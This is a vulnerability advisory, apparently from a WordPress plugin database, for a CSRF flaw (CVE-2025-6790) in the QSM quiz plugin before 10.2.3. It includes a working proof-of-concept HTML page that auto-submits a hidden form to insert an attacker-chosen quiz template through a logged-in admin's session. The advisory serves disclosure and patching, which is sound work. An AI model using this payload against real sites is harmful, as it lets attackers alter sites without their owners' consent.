QSM < 10.2.3 – Template Creation via CSRF | CVE 2025-6790 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.

Proof of Concept

<html>
  <body>
    <form action="http://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="qsm&#95;insert&#95;quiz&#95;template" />
      <input type="hidden" name="template&#95;name" value="HACKED&#95;PAYLOAD" />
      <input type="hidden" name="template&#95;content" value="&lt;h1&gt;HACKED&lt;&#47;h1&gt;" />
      <input type="hidden" name="template&#95;id" value="" />
      <input type="hidden" name="template&#95;type" value="result" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Affects Plugins

quiz-master-next

Fixed in 10.2.3

References

CVE

URL

https://research.cleantalk.org/cve-2025-6790

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://www.linkedin.com/in/dmitriy-ignatyev-8a9189267/

Verified

Yes

WPVDB ID

af337f9f-c955-49eb-9675-2f85da96fcfe

Timeline

Publicly Published

2025-07-24 (about 5 months ago)

Added

2025-07-24 (about 5 months ago)

Last Updated

2025-07-24 (about 5 months ago)

Other

Published

Title

Published

2023-10-25

Title

Custom Header Images <= 1.2.1 - Cross-Site Request Forgery

Published

2023-07-10

Title

Buy Me a Coffee – Button and Widget Plugin < 3.8 - Cross-Site Request Forgery

Published

2024-11-22

Title

Kevin's <= 2.0.0 - Cross-Site Request Forgery

Published

2025-11-03

Title

Top Bar Notification <= 1.12 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2024-04-10

Title

Product Input Fields for WooCommerce < 1.8.0 - Cross-Site Request Forgery to Notice Dismissal